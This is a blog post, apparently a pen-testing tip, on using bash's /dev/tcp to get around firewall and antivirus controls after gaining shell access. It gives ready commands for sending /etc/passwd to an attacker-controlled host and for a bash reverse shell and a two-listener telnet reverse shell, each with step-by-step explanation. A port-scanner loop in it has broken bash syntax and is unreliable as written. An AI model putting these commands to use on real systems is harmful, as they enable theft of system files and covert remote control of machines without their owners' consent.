/dev/tcp as a weapon

Here is some Fu to improve your game when pen testing *nix.

Situation: You have shell access to a *nix system. You are looking to create a reverse shell, scan other machines on the subnet, and do some file transfer (/etc/passwd). However, there are some things preventing you:

  1. Scope prevents you from uploading any files onto the machine
  2. A Firewall/AV prevents using something like netcat.

what do you do? Use /dev/tcp

What is /dev/tcp?

this is a system file that allows you to interact directly with the tcp protocol.


In order to get this to work, you need to be able to set up netcat listeners on your own machine. This can be done like this:

$ nc -l -p <port>

Transfer file:

This is pretty straight forward, just like you would image:

cat /etc/passwd > /dev/tcp/<Attacker_IP>/<Port>

Back on your listener console, you would then see the contents of /etc/passwd displayed. You would then easily pipe that into a file for parsing or future reference.

Port Scanner

This piece or art comes from Pen Testing Ninjitsu. To create a port scanner using built in bash commands, this is what you are looking to do:

$port = 1; while [$port -lt 1024];do echo > /dev/tcp/<TARG_IP>/$port;
 [$? == 0] && echo $port "is open" >> /tmp/ports.txt; port = 'expr 
$port + 1'; done;

Let me break this down for you:

  • Create a variable called port, and set its value equal to 1
port = 1;
  • Create a loop that continues to run as long as the variable ‘port’ is less than 1024
while [$port -lt 1024];
  • For each iteration, send some packets to the target IP address, with the port number equal to the current value of  our ‘port’ variable
do echo > /dev/tcp/<TARG_IP>/$port;
  • Check to see what the bash error value is as a result of that echo into /dev/tcp. Check to see if it is equal to zero, or in other words, check to see if there were no errors
[$? == 0]
  • If it IS equal to zero, or in other words, there were no errors, append a string into /tmp/ports.txt stating that the last scanned port is open
&& echo $port "is open" >> /tmp/ports.txt;
  • Now increment the value of ‘port’ by 1, and finish this iteration of the loop.
port = 'expr $port + 1'; done;

Pretty messy, but also fairly straight forward. You could then just read

Backdoor/Reverse Shell

This is pretty slick in my opinion. Replicates netcat almost exactly. Not as pretty as some things, but still nice:

/bin/bash -i > /dev/tcp/<Attacker_IP>/<port> 0<&1 2>&1

This is also straight forward:

  • Invoke an interactive bash shell
/bin/bash -i
  • Pipe that shell to the attacker (who has a netcat listener running)
> /dev/tcp/<Attacker_IP>/<port>
  • Take standard input, and connect it to standard output. Do the same with standard error (2>)
0<&1 2>&1

This can also be similarly done using telnet by doing the following (although you need two listeners):

telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b>

Pretty elite. hope it helps!


One Response to “/dev/tcp as a weapon”

  1. […] my post on weaponizing /dev/tcp, I had some kickback  from people trying to test it out. Users on a Debian based system will have […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: